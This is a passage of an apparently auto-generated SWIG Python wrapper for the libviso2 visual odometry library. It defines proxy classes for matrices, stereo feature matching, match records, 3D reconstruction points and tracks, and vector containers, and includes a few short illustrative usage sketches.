__repr__ = _swig_repr
def __init__(self, *args):
"""
__init__(self) -> Matrix
__init__(self, m, n) -> Matrix
__init__(self, m, n, val_) -> Matrix
__init__(self, M) -> Matrix
"""
this = _viso2.new_Matrix(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_Matrix
__del__ = lambda self: None
def assign(self, M):
"""assign(self, M) -> Matrix"""
return _viso2.Matrix_assign(self, M)
def getData(self, val_, i1=0, j1=0, i2=-1, j2=-1):
"""
getData(self, val_, i1=0, j1=0, i2=-1, j2=-1)
getData(self, val_, i1=0, j1=0, i2=-1)
getData(self, val_, i1=0, j1=0)
getData(self, val_, i1=0)
getData(self, val_)
"""
return _viso2.Matrix_getData(self, val_, i1, j1, i2, j2)
def getMat(self, i1, j1, i2=-1, j2=-1):
"""
getMat(self, i1, j1, i2=-1, j2=-1) -> Matrix
getMat(self, i1, j1, i2=-1) -> Matrix
getMat(self, i1, j1) -> Matrix
"""
return _viso2.Matrix_getMat(self, i1, j1, i2, j2)
def setMat(self, M, i, j):
"""setMat(self, M, i, j)"""
return _viso2.Matrix_setMat(self, M, i, j)
def setVal(self, s, i1=0, j1=0, i2=-1, j2=-1):
"""
setVal(self, s, i1=0, j1=0, i2=-1, j2=-1)
setVal(self, s, i1=0, j1=0, i2=-1)
setVal(self, s, i1=0, j1=0)
setVal(self, s, i1=0)
setVal(self, s)
"""
return _viso2.Matrix_setVal(self, s, i1, j1, i2, j2)
def setDiag(self, s, i1=0, i2=-1):
"""
setDiag(self, s, i1=0, i2=-1)
setDiag(self, s, i1=0)
setDiag(self, s)
"""
return _viso2.Matrix_setDiag(self, s, i1, i2)
def zero(self):
"""zero(self)"""
return _viso2.Matrix_zero(self)
def extractCols(self, idx):
"""extractCols(self, idx) -> Matrix"""
return _viso2.Matrix_extractCols(self, idx)
def eye(m):
"""eye(m) -> Matrix"""
return _viso2.Matrix_eye(m)
eye = staticmethod(eye)
def identity(self):
"""identity(self)"""
return _viso2.Matrix_identity(self)
def diag(M):
"""diag(M) -> Matrix"""
return _viso2.Matrix_diag(M)
diag = staticmethod(diag)
def reshape(M, m, n):
"""reshape(M, m, n) -> Matrix"""
return _viso2.Matrix_reshape(M, m, n)
reshape = staticmethod(reshape)
def rotMatX(angle):
"""rotMatX(angle) -> Matrix"""
return _viso2.Matrix_rotMatX(angle)
rotMatX = staticmethod(rotMatX)
def rotMatY(angle):
"""rotMatY(angle) -> Matrix"""
return _viso2.Matrix_rotMatY(angle)
rotMatY = staticmethod(rotMatY)
def rotMatZ(angle):
"""rotMatZ(angle) -> Matrix"""
return _viso2.Matrix_rotMatZ(angle)
rotMatZ = staticmethod(rotMatZ)
def __add__(self, M):
"""__add__(self, M) -> Matrix"""
return _viso2.Matrix___add__(self, M)
def __sub__(self, M):
"""__sub__(self, M) -> Matrix"""
return _viso2.Matrix___sub__(self, M)
def __mul__(self, *args):
"""
__mul__(self, M) -> Matrix
__mul__(self, s) -> Matrix
"""
return _viso2.Matrix___mul__(self, *args)
def __truediv__(self, *args):
return _viso2.Matrix___truediv__(self, *args)
__div__ = __truediv__
def __neg__(self):
"""__neg__(self) -> Matrix"""
return _viso2.Matrix___neg__(self)
def __invert__(self):
"""__invert__(self) -> Matrix"""
return _viso2.Matrix___invert__(self)
def l2norm(self):
"""l2norm(self) -> FLOAT"""
return _viso2.Matrix_l2norm(self)
def mean(self):
"""mean(self) -> FLOAT"""
return _viso2.Matrix_mean(self)
def cross(a, b):
"""cross(a, b) -> Matrix"""
return _viso2.Matrix_cross(a, b)
cross = staticmethod(cross)
def inv(M):
"""inv(M) -> Matrix"""
return _viso2.Matrix_inv(M)
inv = staticmethod(inv)
def setInverse(self):
"""setInverse(self) -> bool"""
return _viso2.Matrix_setInverse(self)
def det(self):
"""det(self) -> FLOAT"""
return _viso2.Matrix_det(self)
def solve(self, M, eps=1e-20):
"""
solve(self, M, eps=1e-20) -> bool
solve(self, M) -> bool
"""
return _viso2.Matrix_solve(self, M, eps)
def lu(self, idx, d, eps=1e-20):
"""
lu(self, idx, d, eps=1e-20) -> bool
lu(self, idx, d) -> bool
"""
return _viso2.Matrix_lu(self, idx, d, eps)
def svd(self, U, W, V):
"""svd(self, U, W, V)"""
return _viso2.Matrix_svd(self, U, W, V)
__swig_setmethods__["val"] = _viso2.Matrix_val_set
__swig_getmethods__["val"] = _viso2.Matrix_val_get
if _newclass:
val = _swig_property(_viso2.Matrix_val_get, _viso2.Matrix_val_set)
__swig_setmethods__["m"] = _viso2.Matrix_m_set
__swig_getmethods__["m"] = _viso2.Matrix_m_get
if _newclass:
m = _swig_property(_viso2.Matrix_m_get, _viso2.Matrix_m_set)
__swig_setmethods__["n"] = _viso2.Matrix_n_set
__swig_getmethods__["n"] = _viso2.Matrix_n_get
if _newclass:
n = _swig_property(_viso2.Matrix_n_get, _viso2.Matrix_n_set)
def __str__(self):
"""__str__(self) -> std::string"""
return _viso2.Matrix___str__(self)
def toNumpy(self, mat):
"""toNumpy(self, mat)"""
return _viso2.Matrix_toNumpy(self, mat)
Matrix_swigregister = _viso2.Matrix_swigregister
Matrix_swigregister(Matrix)
def Matrix_eye(m):
"""Matrix_eye(m) -> Matrix"""
return _viso2.Matrix_eye(m)
def Matrix_diag(M):
"""Matrix_diag(M) -> Matrix"""
return _viso2.Matrix_diag(M)
def Matrix_reshape(M, m, n):
"""Matrix_reshape(M, m, n) -> Matrix"""
return _viso2.Matrix_reshape(M, m, n)
def Matrix_rotMatX(angle):
"""Matrix_rotMatX(angle) -> Matrix"""
return _viso2.Matrix_rotMatX(angle)
def Matrix_rotMatY(angle):
"""Matrix_rotMatY(angle) -> Matrix"""
return _viso2.Matrix_rotMatY(angle)
def Matrix_rotMatZ(angle):
"""Matrix_rotMatZ(angle) -> Matrix"""
return _viso2.Matrix_rotMatZ(angle)
def Matrix_cross(a, b):
"""Matrix_cross(a, b) -> Matrix"""
return _viso2.Matrix_cross(a, b)
def Matrix_inv(M):
"""Matrix_inv(M) -> Matrix"""
return _viso2.Matrix_inv(M)
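# ---------------------------------------------------------------------------
# Hedged usage sketch (added for illustration; not part of the generated
# wrapper). It exercises the Matrix proxy defined above; the element values
# are arbitrary and only demonstrate the overloaded operators.
def _example_matrix_ops():
    A = Matrix_eye(3)           # 3x3 identity
    B = Matrix(3, 3, 2.0)       # 3x3 matrix filled with 2.0
    C = A + B                   # uses __add__ defined above; C is invertible
    return C.det(), C.l2norm(), ~C   # determinant, l2 norm of entries, inverse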
class Matcher(_object):
"""Proxy of C++ Matcher class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, Matcher, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, Matcher, name)
__repr__ = _swig_repr
def __init__(self, param):
"""__init__(self, param) -> Matcher"""
this = _viso2.new_Matcher(param)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_Matcher
__del__ = lambda self: None
def setIntrinsics(self, f, cu, cv, base):
"""setIntrinsics(self, f, cu, cv, base)"""
return _viso2.Matcher_setIntrinsics(self, f, cu, cv, base)
def matchFeatures(self, method, Tr_delta=None):
"""
matchFeatures(self, method, Tr_delta=None)
matchFeatures(self, method)
"""
return _viso2.Matcher_matchFeatures(self, method, Tr_delta)
def bucketFeatures(self, max_features, bucket_width, bucket_height):
"""bucketFeatures(self, max_features, bucket_width, bucket_height)"""
return _viso2.Matcher_bucketFeatures(self, max_features, bucket_width, bucket_height)
def getMatches(self):
"""getMatches(self) -> MatchVector"""
return _viso2.Matcher_getMatches(self)
def getGain(self, inliers):
"""getGain(self, inliers) -> float"""
return _viso2.Matcher_getGain(self, inliers)
def pushBack(self, *args):
"""
pushBack(self, I1, I2, dims, replace)
pushBack(self, I1, dims, replace)
pushBack(self, image1, image2, replace=False)
pushBack(self, image1, image2)
pushBack(self, image1, replace=False)
pushBack(self, image1)
"""
return _viso2.Matcher_pushBack(self, *args)
Matcher_swigregister = _viso2.Matcher_swigregister
Matcher_swigregister(Matcher)
class Matcher_parameters(_object):
"""Proxy of C++ Matcher::parameters class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, Matcher_parameters, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, Matcher_parameters, name)
__repr__ = _swig_repr
__swig_setmethods__["nms_n"] = _viso2.Matcher_parameters_nms_n_set
__swig_getmethods__["nms_n"] = _viso2.Matcher_parameters_nms_n_get
if _newclass:
nms_n = _swig_property(_viso2.Matcher_parameters_nms_n_get, _viso2.Matcher_parameters_nms_n_set)
__swig_setmethods__["nms_tau"] = _viso2.Matcher_parameters_nms_tau_set
__swig_getmethods__["nms_tau"] = _viso2.Matcher_parameters_nms_tau_get
if _newclass:
nms_tau = _swig_property(_viso2.Matcher_parameters_nms_tau_get, _viso2.Matcher_parameters_nms_tau_set)
__swig_setmethods__["match_binsize"] = _viso2.Matcher_parameters_match_binsize_set
__swig_getmethods__["match_binsize"] = _viso2.Matcher_parameters_match_binsize_get
if _newclass:
match_binsize = _swig_property(_viso2.Matcher_parameters_match_binsize_get, _viso2.Matcher_parameters_match_binsize_set)
__swig_setmethods__["match_radius"] = _viso2.Matcher_parameters_match_radius_set
__swig_getmethods__["match_radius"] = _viso2.Matcher_parameters_match_radius_get
if _newclass:
match_radius = _swig_property(_viso2.Matcher_parameters_match_radius_get, _viso2.Matcher_parameters_match_radius_set)
__swig_setmethods__["match_disp_tolerance"] = _viso2.Matcher_parameters_match_disp_tolerance_set
__swig_getmethods__["match_disp_tolerance"] = _viso2.Matcher_parameters_match_disp_tolerance_get
if _newclass:
match_disp_tolerance = _swig_property(_viso2.Matcher_parameters_match_disp_tolerance_get, _viso2.Matcher_parameters_match_disp_tolerance_set)
__swig_setmethods__["outlier_disp_tolerance"] = _viso2.Matcher_parameters_outlier_disp_tolerance_set
__swig_getmethods__["outlier_disp_tolerance"] = _viso2.Matcher_parameters_outlier_disp_tolerance_get
if _newclass:
outlier_disp_tolerance = _swig_property(_viso2.Matcher_parameters_outlier_disp_tolerance_get, _viso2.Matcher_parameters_outlier_disp_tolerance_set)
__swig_setmethods__["outlier_flow_tolerance"] = _viso2.Matcher_parameters_outlier_flow_tolerance_set
__swig_getmethods__["outlier_flow_tolerance"] = _viso2.Matcher_parameters_outlier_flow_tolerance_get
if _newclass:
outlier_flow_tolerance = _swig_property(_viso2.Matcher_parameters_outlier_flow_tolerance_get, _viso2.Matcher_parameters_outlier_flow_tolerance_set)
__swig_setmethods__["multi_stage"] = _viso2.Matcher_parameters_multi_stage_set
__swig_getmethods__["multi_stage"] = _viso2.Matcher_parameters_multi_stage_get
if _newclass:
multi_stage = _swig_property(_viso2.Matcher_parameters_multi_stage_get, _viso2.Matcher_parameters_multi_stage_set)
__swig_setmethods__["half_resolution"] = _viso2.Matcher_parameters_half_resolution_set
__swig_getmethods__["half_resolution"] = _viso2.Matcher_parameters_half_resolution_get
if _newclass:
half_resolution = _swig_property(_viso2.Matcher_parameters_half_resolution_get, _viso2.Matcher_parameters_half_resolution_set)
__swig_setmethods__["refinement"] = _viso2.Matcher_parameters_refinement_set
__swig_getmethods__["refinement"] = _viso2.Matcher_parameters_refinement_get
if _newclass:
refinement = _swig_property(_viso2.Matcher_parameters_refinement_get, _viso2.Matcher_parameters_refinement_set)
__swig_setmethods__["f"] = _viso2.Matcher_parameters_f_set
__swig_getmethods__["f"] = _viso2.Matcher_parameters_f_get
if _newclass:
f = _swig_property(_viso2.Matcher_parameters_f_get, _viso2.Matcher_parameters_f_set)
__swig_setmethods__["cu"] = _viso2.Matcher_parameters_cu_set
__swig_getmethods__["cu"] = _viso2.Matcher_parameters_cu_get
if _newclass:
cu = _swig_property(_viso2.Matcher_parameters_cu_get, _viso2.Matcher_parameters_cu_set)
__swig_setmethods__["cv"] = _viso2.Matcher_parameters_cv_set
__swig_getmethods__["cv"] = _viso2.Matcher_parameters_cv_get
if _newclass:
cv = _swig_property(_viso2.Matcher_parameters_cv_get, _viso2.Matcher_parameters_cv_set)
__swig_setmethods__["base"] = _viso2.Matcher_parameters_base_set
__swig_getmethods__["base"] = _viso2.Matcher_parameters_base_get
if _newclass:
base = _swig_property(_viso2.Matcher_parameters_base_get, _viso2.Matcher_parameters_base_set)
def __init__(self):
"""__init__(self) -> Matcher_parameters"""
this = _viso2.new_Matcher_parameters()
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_Matcher_parameters
__del__ = lambda self: None
Matcher_parameters_swigregister = _viso2.Matcher_parameters_swigregister
Matcher_parameters_swigregister(Matcher_parameters)
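# ---------------------------------------------------------------------------
# Hedged usage sketch (added for illustration; not part of the generated
# wrapper). It runs the standalone Matcher proxy above on two stereo pairs.
# The integer passed to matchFeatures() follows the upstream libviso2
# convention for the matching mode and is an assumption here, as are the
# intrinsics; images are assumed to be 8-bit grayscale arrays.
def _example_matching(prev_left, prev_right, cur_left, cur_right):
    m = Matcher(Matcher_parameters())
    m.setIntrinsics(645.2, 635.9, 194.1, 0.571)  # f, cu, cv, baseline (assumed)
    m.pushBack(prev_left, prev_right)            # previous stereo pair
    m.pushBack(cur_left, cur_right)              # current stereo pair
    m.matchFeatures(2)                           # 2 = quad matching (assumed)
    return m.getMatches()                        # MatchVector of p_match entries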
class p_match(_object):
"""Proxy of C++ Matcher::p_match class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, p_match, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, p_match, name)
__repr__ = _swig_repr
__swig_setmethods__["u1p"] = _viso2.p_match_u1p_set
__swig_getmethods__["u1p"] = _viso2.p_match_u1p_get
if _newclass:
u1p = _swig_property(_viso2.p_match_u1p_get, _viso2.p_match_u1p_set)
__swig_setmethods__["v1p"] = _viso2.p_match_v1p_set
__swig_getmethods__["v1p"] = _viso2.p_match_v1p_get
if _newclass:
v1p = _swig_property(_viso2.p_match_v1p_get, _viso2.p_match_v1p_set)
__swig_setmethods__["i1p"] = _viso2.p_match_i1p_set
__swig_getmethods__["i1p"] = _viso2.p_match_i1p_get
if _newclass:
i1p = _swig_property(_viso2.p_match_i1p_get, _viso2.p_match_i1p_set)
__swig_setmethods__["u2p"] = _viso2.p_match_u2p_set
__swig_getmethods__["u2p"] = _viso2.p_match_u2p_get
if _newclass:
u2p = _swig_property(_viso2.p_match_u2p_get, _viso2.p_match_u2p_set)
__swig_setmethods__["v2p"] = _viso2.p_match_v2p_set
__swig_getmethods__["v2p"] = _viso2.p_match_v2p_get
if _newclass:
v2p = _swig_property(_viso2.p_match_v2p_get, _viso2.p_match_v2p_set)
__swig_setmethods__["i2p"] = _viso2.p_match_i2p_set
__swig_getmethods__["i2p"] = _viso2.p_match_i2p_get
if _newclass:
i2p = _swig_property(_viso2.p_match_i2p_get, _viso2.p_match_i2p_set)
__swig_setmethods__["u1c"] = _viso2.p_match_u1c_set
__swig_getmethods__["u1c"] = _viso2.p_match_u1c_get
if _newclass:
u1c = _swig_property(_viso2.p_match_u1c_get, _viso2.p_match_u1c_set)
__swig_setmethods__["v1c"] = _viso2.p_match_v1c_set
__swig_getmethods__["v1c"] = _viso2.p_match_v1c_get
if _newclass:
v1c = _swig_property(_viso2.p_match_v1c_get, _viso2.p_match_v1c_set)
__swig_setmethods__["i1c"] = _viso2.p_match_i1c_set
__swig_getmethods__["i1c"] = _viso2.p_match_i1c_get
if _newclass:
i1c = _swig_property(_viso2.p_match_i1c_get, _viso2.p_match_i1c_set)
__swig_setmethods__["u2c"] = _viso2.p_match_u2c_set
__swig_getmethods__["u2c"] = _viso2.p_match_u2c_get
if _newclass:
u2c = _swig_property(_viso2.p_match_u2c_get, _viso2.p_match_u2c_set)
__swig_setmethods__["v2c"] = _viso2.p_match_v2c_set
__swig_getmethods__["v2c"] = _viso2.p_match_v2c_get
if _newclass:
v2c = _swig_property(_viso2.p_match_v2c_get, _viso2.p_match_v2c_set)
__swig_setmethods__["i2c"] = _viso2.p_match_i2c_set
__swig_getmethods__["i2c"] = _viso2.p_match_i2c_get
if _newclass:
i2c = _swig_property(_viso2.p_match_i2c_get, _viso2.p_match_i2c_set)
def __init__(self, *args):
"""
__init__(self) -> p_match
__init__(self, u1p, v1p, i1p, u2p, v2p, i2p, u1c, v1c, i1c, u2c, v2c, i2c) -> p_match
"""
this = _viso2.new_p_match(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_p_match
__del__ = lambda self: None
p_match_swigregister = _viso2.p_match_swigregister
p_match_swigregister(p_match)
class Reconstruction(_object):
"""Proxy of C++ Reconstruction class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, Reconstruction, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, Reconstruction, name)
__repr__ = _swig_repr
def __init__(self):
"""__init__(self) -> Reconstruction"""
this = _viso2.new_Reconstruction()
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_Reconstruction
__del__ = lambda self: None
def setCalibration(self, f, cu, cv):
"""setCalibration(self, f, cu, cv)"""
return _viso2.Reconstruction_setCalibration(self, f, cu, cv)
def update(self, p_matched, Tr, point_type=1, min_track_length=2, max_dist=30, min_angle=2):
"""
update(self, p_matched, Tr, point_type=1, min_track_length=2, max_dist=30, min_angle=2)
update(self, p_matched, Tr, point_type=1, min_track_length=2, max_dist=30)
update(self, p_matched, Tr, point_type=1, min_track_length=2)
update(self, p_matched, Tr, point_type=1)
update(self, p_matched, Tr)
"""
return _viso2.Reconstruction_update(self, p_matched, Tr, point_type, min_track_length, max_dist, min_angle)
def getPoints(self):
"""getPoints(self) -> Point3dVector"""
return _viso2.Reconstruction_getPoints(self)
def getTracks(self):
"""getTracks(self) -> TrackVector"""
return _viso2.Reconstruction_getTracks(self)
Reconstruction_swigregister = _viso2.Reconstruction_swigregister
Reconstruction_swigregister(Reconstruction)
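# ---------------------------------------------------------------------------
# Hedged usage sketch (added for illustration; not part of the generated
# wrapper). It feeds matches and a pose estimate into the Reconstruction
# proxy above; `matches` is assumed to be a MatchVector and `pose` a 4x4
# Matrix (e.g. from VisualOdometryStereo.getMotion()), and the calibration
# values are placeholder assumptions.
def _example_reconstruction(matches, pose):
    recon = Reconstruction()
    recon.setCalibration(645.2, 635.9, 194.1)   # f, cu, cv in pixels (assumed)
    recon.update(matches, pose)                 # default track/point options
    return [(p.x, p.y, p.z) for p in recon.getPoints()]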
class point3d(_object):
"""Proxy of C++ Reconstruction::point3d class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, point3d, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, point3d, name)
__repr__ = _swig_repr
__swig_setmethods__["x"] = _viso2.point3d_x_set
__swig_getmethods__["x"] = _viso2.point3d_x_get
if _newclass:
x = _swig_property(_viso2.point3d_x_get, _viso2.point3d_x_set)
__swig_setmethods__["y"] = _viso2.point3d_y_set
__swig_getmethods__["y"] = _viso2.point3d_y_get
if _newclass:
y = _swig_property(_viso2.point3d_y_get, _viso2.point3d_y_set)
__swig_setmethods__["z"] = _viso2.point3d_z_set
__swig_getmethods__["z"] = _viso2.point3d_z_get
if _newclass:
z = _swig_property(_viso2.point3d_z_get, _viso2.point3d_z_set)
def __init__(self, *args):
"""
__init__(self) -> point3d
__init__(self, x, y, z) -> point3d
"""
this = _viso2.new_point3d(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_point3d
__del__ = lambda self: None
point3d_swigregister = _viso2.point3d_swigregister
point3d_swigregister(point3d)
class point2d(_object):
"""Proxy of C++ Reconstruction::point2d class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, point2d, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, point2d, name)
__repr__ = _swig_repr
__swig_setmethods__["u"] = _viso2.point2d_u_set
__swig_getmethods__["u"] = _viso2.point2d_u_get
if _newclass:
u = _swig_property(_viso2.point2d_u_get, _viso2.point2d_u_set)
__swig_setmethods__["v"] = _viso2.point2d_v_set
__swig_getmethods__["v"] = _viso2.point2d_v_get
if _newclass:
v = _swig_property(_viso2.point2d_v_get, _viso2.point2d_v_set)
def __init__(self, *args):
"""
__init__(self) -> point2d
__init__(self, u, v) -> point2d
"""
this = _viso2.new_point2d(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_point2d
__del__ = lambda self: None
point2d_swigregister = _viso2.point2d_swigregister
point2d_swigregister(point2d)
class track(_object):
"""Proxy of C++ Reconstruction::track class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, track, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, track, name)
__repr__ = _swig_repr
__swig_setmethods__["pixels"] = _viso2.track_pixels_set
__swig_getmethods__["pixels"] = _viso2.track_pixels_get
if _newclass:
pixels = _swig_property(_viso2.track_pixels_get, _viso2.track_pixels_set)
__swig_setmethods__["pt"] = _viso2.track_pt_set
__swig_getmethods__["pt"] = _viso2.track_pt_get
if _newclass:
pt = _swig_property(_viso2.track_pt_get, _viso2.track_pt_set)
__swig_setmethods__["valid"] = _viso2.track_valid_set
__swig_getmethods__["valid"] = _viso2.track_valid_get
if _newclass:
valid = _swig_property(_viso2.track_valid_get, _viso2.track_valid_set)
__swig_setmethods__["first_frame"] = _viso2.track_first_frame_set
__swig_getmethods__["first_frame"] = _viso2.track_first_frame_get
if _newclass:
first_frame = _swig_property(_viso2.track_first_frame_get, _viso2.track_first_frame_set)
__swig_setmethods__["last_frame"] = _viso2.track_last_frame_set
__swig_getmethods__["last_frame"] = _viso2.track_last_frame_get
if _newclass:
last_frame = _swig_property(_viso2.track_last_frame_get, _viso2.track_last_frame_set)
__swig_setmethods__["last_idx"] = _viso2.track_last_idx_set
__swig_getmethods__["last_idx"] = _viso2.track_last_idx_get
if _newclass:
last_idx = _swig_property(_viso2.track_last_idx_get, _viso2.track_last_idx_set)
def __init__(self):
"""__init__(self) -> track"""
this = _viso2.new_track()
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_track
__del__ = lambda self: None
track_swigregister = _viso2.track_swigregister
track_swigregister(track)
class MatchVector(_object):
"""Proxy of C++ std::vector<(Matcher::p_match)> class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, MatchVector, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, MatchVector, name)
__repr__ = _swig_repr
def iterator(self):
"""iterator(self) -> SwigPyIterator"""
return _viso2.MatchVector_iterator(self)
def __iter__(self):
return self.iterator()
def __nonzero__(self):
"""__nonzero__(self) -> bool"""
return _viso2.MatchVector___nonzero__(self)
def __bool__(self):
"""__bool__(self) -> bool"""
return _viso2.MatchVector___bool__(self)
def __len__(self):
"""__len__(self) -> std::vector< Matcher::p_match >::size_type"""
return _viso2.MatchVector___len__(self)
def __getslice__(self, i, j):
"""__getslice__(self, i, j) -> MatchVector"""
return _viso2.MatchVector___getslice__(self, i, j)
def __setslice__(self, *args):
"""
__setslice__(self, i, j)
__setslice__(self, i, j, v)
"""
return _viso2.MatchVector___setslice__(self, *args)
def __delslice__(self, i, j):
"""__delslice__(self, i, j)"""
return _viso2.MatchVector___delslice__(self, i, j)
def __delitem__(self, *args):
"""
__delitem__(self, i)
__delitem__(self, slice)
"""
return _viso2.MatchVector___delitem__(self, *args)
def __getitem__(self, *args):
"""
__getitem__(self, slice) -> MatchVector
__getitem__(self, i) -> p_match
"""
return _viso2.MatchVector___getitem__(self, *args)
def __setitem__(self, *args):
"""
__setitem__(self, slice, v)
__setitem__(self, slice)
__setitem__(self, i, x)
"""
return _viso2.MatchVector___setitem__(self, *args)
def pop(self):
"""pop(self) -> p_match"""
return _viso2.MatchVector_pop(self)
def append(self, x):
"""append(self, x)"""
return _viso2.MatchVector_append(self, x)
def empty(self):
"""empty(self) -> bool"""
return _viso2.MatchVector_empty(self)
def size(self):
"""size(self) -> std::vector< Matcher::p_match >::size_type"""
return _viso2.MatchVector_size(self)
def swap(self, v):
"""swap(self, v)"""
return _viso2.MatchVector_swap(self, v)
def begin(self):
"""begin(self) -> std::vector< Matcher::p_match >::iterator"""
return _viso2.MatchVector_begin(self)
def end(self):
"""end(self) -> std::vector< Matcher::p_match >::iterator"""
return _viso2.MatchVector_end(self)
def rbegin(self):
"""rbegin(self) -> std::vector< Matcher::p_match >::reverse_iterator"""
return _viso2.MatchVector_rbegin(self)
def rend(self):
"""rend(self) -> std::vector< Matcher::p_match >::reverse_iterator"""
return _viso2.MatchVector_rend(self)
def clear(self):
"""clear(self)"""
return _viso2.MatchVector_clear(self)
def get_allocator(self):
"""get_allocator(self) -> std::vector< Matcher::p_match >::allocator_type"""
return _viso2.MatchVector_get_allocator(self)
def pop_back(self):
"""pop_back(self)"""
return _viso2.MatchVector_pop_back(self)
def erase(self, *args):
"""
erase(self, pos) -> std::vector< Matcher::p_match >::iterator
erase(self, first, last) -> std::vector< Matcher::p_match >::iterator
"""
return _viso2.MatchVector_erase(self, *args)
def __init__(self, *args):
"""
__init__(self) -> MatchVector
__init__(self, arg2) -> MatchVector
__init__(self, size) -> MatchVector
__init__(self, size, value) -> MatchVector
"""
this = _viso2.new_MatchVector(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
def push_back(self, x):
"""push_back(self, x)"""
return _viso2.MatchVector_push_back(self, x)
def front(self):
"""front(self) -> p_match"""
return _viso2.MatchVector_front(self)
def back(self):
"""back(self) -> p_match"""
return _viso2.MatchVector_back(self)
def assign(self, n, x):
"""assign(self, n, x)"""
return _viso2.MatchVector_assign(self, n, x)
def resize(self, *args):
"""
resize(self, new_size)
resize(self, new_size, x)
"""
return _viso2.MatchVector_resize(self, *args)
def insert(self, *args):
"""
insert(self, pos, x) -> std::vector< Matcher::p_match >::iterator
insert(self, pos, n, x)
"""
return _viso2.MatchVector_insert(self, *args)
def reserve(self, n):
"""reserve(self, n)"""
return _viso2.MatchVector_reserve(self, n)
def capacity(self):
"""capacity(self) -> std::vector< Matcher::p_match >::size_type"""
return _viso2.MatchVector_capacity(self)
__swig_destroy__ = _viso2.delete_MatchVector
__del__ = lambda self: None
MatchVector_swigregister = _viso2.MatchVector_swigregister
MatchVector_swigregister(MatchVector)
class Point3dVector(_object):
"""Proxy of C++ std::vector<(Reconstruction::point3d)> class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, Point3dVector, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, Point3dVector, name)
__repr__ = _swig_repr
def iterator(self):
"""iterator(self) -> SwigPyIterator"""
return _viso2.Point3dVector_iterator(self)
def __iter__(self):
return self.iterator()
def __nonzero__(self):
"""__nonzero__(self) -> bool"""
return _viso2.Point3dVector___nonzero__(self)
def __bool__(self):
"""__bool__(self) -> bool"""
return _viso2.Point3dVector___bool__(self)
def __len__(self):
"""__len__(self) -> std::vector< Reconstruction::point3d >::size_type"""
return _viso2.Point3dVector___len__(self)
def __getslice__(self, i, j):
"""__getslice__(self, i, j) -> Point3dVector"""
return _viso2.Point3dVector___getslice__(self, i, j)
def __setslice__(self, *args):
"""
__setslice__(self, i, j)
__setslice__(self, i, j, v)
"""
return _viso2.Point3dVector___setslice__(self, *args)
def __delslice__(self, i, j):
"""__delslice__(self, i, j)"""
return _viso2.Point3dVector___delslice__(self, i, j)
def __delitem__(self, *args):
"""
__delitem__(self, i)
__delitem__(self, slice)
"""
return _viso2.Point3dVector___delitem__(self, *args)
def __getitem__(self, *args):
"""
__getitem__(self, slice) -> Point3dVector
__getitem__(self, i) -> point3d
"""
return _viso2.Point3dVector___getitem__(self, *args)
def __setitem__(self, *args):
"""
__setitem__(self, slice, v)
__setitem__(self, slice)
__setitem__(self, i, x)
"""
return _viso2.Point3dVector___setitem__(self, *args)
def pop(self):
"""pop(self) -> point3d"""
return _viso2.Point3dVector_pop(self)
def append(self, x):
"""append(self, x)"""
return _viso2.Point3dVector_append(self, x)
def empty(self):
"""empty(self) -> bool"""
return _viso2.Point3dVector_empty(self)
def size(self):
"""size(self) -> std::vector< Reconstruction::point3d >::size_type"""
return _viso2.Point3dVector_size(self)
def swap(self, v):
"""swap(self, v)"""
return _viso2.Point3dVector_swap(self, v)
def begin(self):
"""begin(self) -> std::vector< Reconstruction::point3d >::iterator"""
return _viso2.Point3dVector_begin(self)
def end(self):
"""end(self) -> std::vector< Reconstruction::point3d >::iterator"""
return _viso2.Point3dVector_end(self)
def rbegin(self):
"""rbegin(self) -> std::vector< Reconstruction::point3d >::reverse_iterator"""
return _viso2.Point3dVector_rbegin(self)
def rend(self):
"""rend(self) -> std::vector< Reconstruction::point3d >::reverse_iterator"""
return _viso2.Point3dVector_rend(self)
def clear(self):
"""clear(self)"""
return _viso2.Point3dVector_clear(self)
def get_allocator(self):
"""get_allocator(self) -> std::vector< Reconstruction::point3d >::allocator_type"""
return _viso2.Point3dVector_get_allocator(self)
def pop_back(self):
"""pop_back(self)"""
return _viso2.Point3dVector_pop_back(self)
def erase(self, *args):
"""
erase(self, pos) -> std::vector< Reconstruction::point3d >::iterator
erase(self, first, last) -> std::vector< Reconstruction::point3d >::iterator
"""
return _viso2.Point3dVector_erase(self, *args)
def __init__(self, *args):
"""
__init__(self) -> Point3dVector
__init__(self, arg2) -> Point3dVector
